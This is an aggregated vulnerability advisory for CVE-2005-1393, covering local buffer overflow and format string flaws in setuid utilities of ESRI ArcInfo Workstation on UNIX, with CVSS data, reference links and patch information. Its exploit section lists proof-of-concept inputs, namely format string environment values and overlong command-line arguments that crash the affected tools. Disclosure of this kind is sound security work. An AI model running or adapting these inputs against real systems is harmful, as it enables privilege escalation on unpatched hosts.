CVE-2005-1393
CVSS 4.6
Published: 2005-05-03 00:00:00
Last revised: 2016-10-17 23:19:45

[Original] Multiple buffer overflows in ArcGIS for ESRI ArcInfo Workstation 9.0 allow local users to execute arbitrary code via long command line arguments to (1) asmaster, (2) asuser, (3) asutility, (4) se, or (5) asrecovery.


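[CNNVD] ESRI ArcInfo Workstation Multiple Local Buffer Overflow and Format String Vulnerabilities (CNNVD-200505-850)

        ArcGIS in ESRI ArcInfo Workstation 9.0 contains multiple buffer overflow vulnerabilities. Local users can execute arbitrary code via long command line arguments passed to (1) asmaster, (2) asuser, (3) asutility, (4) se, or (5) asrecovery.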

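- CVSS (Base Score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may reduce performance or interrupt access to resources]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (Affected Platforms and Products)

Product and version information (CPE) is not currently available

- OVAL (Technical Details for Detection)

No related OVAL definitions found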

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1393
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1393
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-850
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=full-disclosure&m=111489411524630&w=2
(UNKNOWN)  FULLDISC  20050430 DMA[2005-0425a] - 'ESRI ArcGIS 9.x multiple local vulnerabilities
http://securitytracker.com/id?1013852
(UNKNOWN)  SECTRACK  1013852
http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
(UNKNOWN)  CONFIRM  http://support.esri.com/index.cfm?fa=downloads.patchesServicePacks.viewPatch&PID=14&MetaID=1015
http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt
(PATCH)  MISC  http://www.digitalmunition.com/DMA%5B2005-0425a%5D.txt

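- Vulnerability Information

ESRI ArcInfo Workstation Multiple Local Buffer Overflow and Format String Vulnerabilities
Medium severity  Buffer overflow
2005-05-03 00:00:00 2005-10-20 00:00:00
Local
        ArcGIS in ESRI ArcInfo Workstation 9.0 contains multiple buffer overflow vulnerabilities. Local users can execute arbitrary code via long command line arguments passed to (1) asmaster, (2) asuser, (3) asutility, (4) se, or (5) asrecovery.

- Advisories and Patches

        No data available

- Vulnerability Information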

16059
ArcInfo Workstation asmaster Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Unknown

- Vulnerability Description

A local overflow exists in ESRI ArcInfo Workstation. Asmaster fails to handle overly long command line arguments issued resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary files with root access resulting in a loss of integrity.

- Timeline

2005-04-30 2005-01-08
Unknown Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, ESRI has released a patch to address this vulnerability.

- Related References

- Vulnerability Author

- Vulnerability Information

ESRI ArcInfo Workstation Multiple Local Buffer Overflow And Format String Vulnerabilities
Unknown 13453
No Yes
2005-04-30 12:00:00 2009-07-12 02:06:00
Discovery is credited to Kevin Finisterre.

- Affected Program Versions

ESRI ArcInfo Workstation on UNIX 9.0
ESRI ArcInfo Workstation on UNIX 8.3

- Vulnerability Discussion

ESRI ArcInfo Workstation is prone to multiple local buffer overflow and format string vulnerabilities. These vulnerabilities exist in various setuid/setgid utilities installed by ArcInfo Workstation.

The vulnerabilities may be exploited to execute arbitrary code with elevated privileges.

It is believed that the vulnerabilities affect all ArcInfo Workstation installations on UNIX platforms.

- Exploit

The following proof-of-concept examples were provided:

-bash-2.05b$ export ARCHOME=AAAABBBB%x.%x.%x.%x

-bash-2.05b$ ./wservice
Can not find or access AAAABBBB7ffffc00.2a078.9e39c.241 - wservice not run!

-bash-2.05b# export ARCHOME=%x.%x.%x.%x
-bash-2.05b# ./lockmgr
Can not find or access 7ffffc00.2a15c.9e39c.36 - lockmgr not run!

-bash-2.05b# ./asmaster `perl -e 'print "A" x 2285'` b
FATAL ERROR
Segment Violation

-bash-2.05b# ./asuser `perl -e 'print "A" x 694'` a a a
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility DBDEF REMOVE `perl -e 'print "A" x 701'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility RMDB `perl -e 'print "A" x 1865'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asutility CHECKDBIDS AVAILABLE `perl -e 'print "A" x 804'`
FATAL ERROR
Segment Violation

-bash-2.05b# ../bin/se `perl -e 'print "A" x 1278'`
FATAL ERROR
Segment Violation

-bash-2.05b# ./asrecovery `perl -e 'print "A" x 1987'` a a a
FATAL ERROR
Segment Violation

Exploit code was also released for the 'wservice' format string vulnerability.

- Solution

The vendor has released patches for ArcInfo Workstation 9.0 on UNIX. Please see the "ArcInfo Workstation 9.0 Security Patch on UNIX" advisory for further details.

ESRI has released a patch for ArcInfo Workstation 8.3 on UNIX.


ESRI ArcInfo Workstation on UNIX 8.3

- Related References

 

 
